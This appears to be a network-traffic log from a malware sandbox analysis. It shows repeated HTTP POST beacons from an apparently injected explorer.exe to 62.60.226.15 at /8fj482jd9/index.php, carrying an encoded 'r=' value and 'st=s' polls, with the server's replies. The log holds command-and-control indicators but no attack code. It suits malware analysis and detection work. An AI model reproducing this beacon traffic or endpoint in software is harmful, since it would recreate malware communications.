                                                Date: Mon, 16 Dec 2024 14:28:35 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                37 | 192.168.2.10 | 49761 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:37.454210997 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:38.749696970 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                38 | 192.168.2.10 | 49762 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:40.577435017 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:41.844940901 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:41 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 39 | Source IP: 192.168.2.10 | Source Port: 49763 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:28:43.470067024 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:28:44.747591019 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:44 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 40 | Source IP: 192.168.2.10 | Source Port: 49764 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:28:46.500639915 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:28:47.798458099 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 41 | Source IP: 192.168.2.10 | Source Port: 49765 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:28:49.422514915 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:28:50.703238964 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 42 | Source IP: 192.168.2.10 | Source Port: 49766 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:28:52.453998089 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:28:53.721385956 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 43 | Source IP: 192.168.2.10 | Source Port: 49767 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:28:55.363886118 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:28:56.644545078 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 44 | Source IP: 192.168.2.10 | Source Port: 49768 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:28:58.392465115 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:28:59.674299002 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 45 | Source IP: 192.168.2.10 | Source Port: 49769 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:01.317910910 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:29:02.593630075 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 46 | Source IP: 192.168.2.10 | Source Port: 49770 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:04.346657991 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:29:05.614727974 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 47 | Source IP: 192.168.2.10 | Source Port: 49771 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:07.376087904 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:29:08.634172916 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 48 | Source IP: 192.168.2.10 | Source Port: 49772 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:10.375614882 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:29:11.643517971 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 49 | Source IP: 192.168.2.10 | Source Port: 49773 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:13.282543898 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:29:14.553715944 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 50 | Source IP: 192.168.2.10 | Source Port: 49774 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:16.298041105 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:29:17.565325975 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 51 | Source IP: 192.168.2.10 | Source Port: 49775 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:19.204518080 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:29:20.475075006 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:20 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 52 | Source IP: 192.168.2.10 | Source Port: 49776 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:22.220531940 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:29:23.497365952 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 53 | Source IP: 192.168.2.10 | Source Port: 49777 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:25.128011942 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Timestamp: Dec 16, 2024 15:29:26.426583052 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID: 54 | Source IP: 192.168.2.10 | Source Port: 49778 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:28.180047989 CET | Bytes transferred: 155 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Timestamp: Dec 16, 2024 15:29:29.457067013 CET | Bytes transferred: 219 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID: 55 | Source IP: 192.168.2.10 | Source Port: 49779 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
                                                Timestamp: Dec 16, 2024 15:29:31.095058918 CET | Bytes transferred: 305 | Direction: OUT | Data: POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:32.365231991 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:32 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


Session ID: 56 | Source IP: 192.168.2.10 | Source Port: 49780 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:34.111773968 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:29:35.385090113 CET | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 57 | Source IP: 192.168.2.10 | Source Port: 49781 | Destination IP: 62.60.226.15 | Destination Port: 80 | PID: 2972 | Process: C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 15:29:37.018239021 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:29:38.291567087 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:29:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
